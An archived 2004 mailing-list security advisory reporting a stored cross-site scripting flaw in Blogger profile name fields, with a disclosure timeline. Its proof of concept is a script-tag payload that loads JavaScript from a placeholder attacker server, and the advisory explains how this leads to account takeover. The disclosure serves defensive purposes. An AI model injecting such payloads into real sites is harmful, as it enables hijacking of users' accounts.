lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <200403261516.i2QFG1X24495@netsys.com>
From: ferruh at mavituna.com (Ferruh Mavituna)
Subject: Blogger XSS Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------
BLOGGER XSS VULNERABILITY
- ------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?470
Severity : Moderately Critical for Members (Permanent Account
Hijacking)

- ------------------------------------------------------
ABOUT BLOGGER;
- ------------------------------------------------------
Blogger is a web-based tool that helps you publish to the web
instantly -- whenever the urge strikes. Blogger is the leading tool
in the rapidly growing area of web publishing known as weblogs, or
"blogs."

by Google (Pyra Labs acquired by Google)

- ------------------------------------------------------
XSS DETAILS;
- ------------------------------------------------------
There is no HTML filter when rendering user profiles. So anyone can
inject a script into a profile's "First Name" "Last Name" etc.

If you inject a code into "First Name" this will be print and run in
users's first page [www.blogger.com], so an attacker can easily gain
victim's account.



	------------------------------------------------------
	Proof Of Concept;
	------------------------------------------------------
	Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] to
victim "First Name"
	Now you can execute anything in remote.

	After login as your victim;
		  I. You can change password (without old password)
		 II. You can change e-mail address without any confirmation
		III. You can own the victim blogs

	
	*Replace ][,<>
	*Script injection is limited to 50 characters (but it's pretty
enough to add js script)


- -----------------------------------------------------
HISTORY;
- ------------------------------------------------------
Discovered : 2/22/2004
Vendor Informed : 2/25/2004
Published : 3/26/2004

- ------------------------------------------------------
VENDOR STATUS;
- ------------------------------------------------------
Contact established with Google but there is no answer.

Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
ferruh@...ituna.com

PGPKey : http://ferruh.mavituna.com/PGPKey.asc


-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0.3

iQA/AwUBQGRJDzL0QoVzo2STEQJmRwCgxUQ+ZG5yfajXvitVnJDhB9e5lY4AoNGB
ANN10x5LT+9GahY9KvS9PURv
=YmrO
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ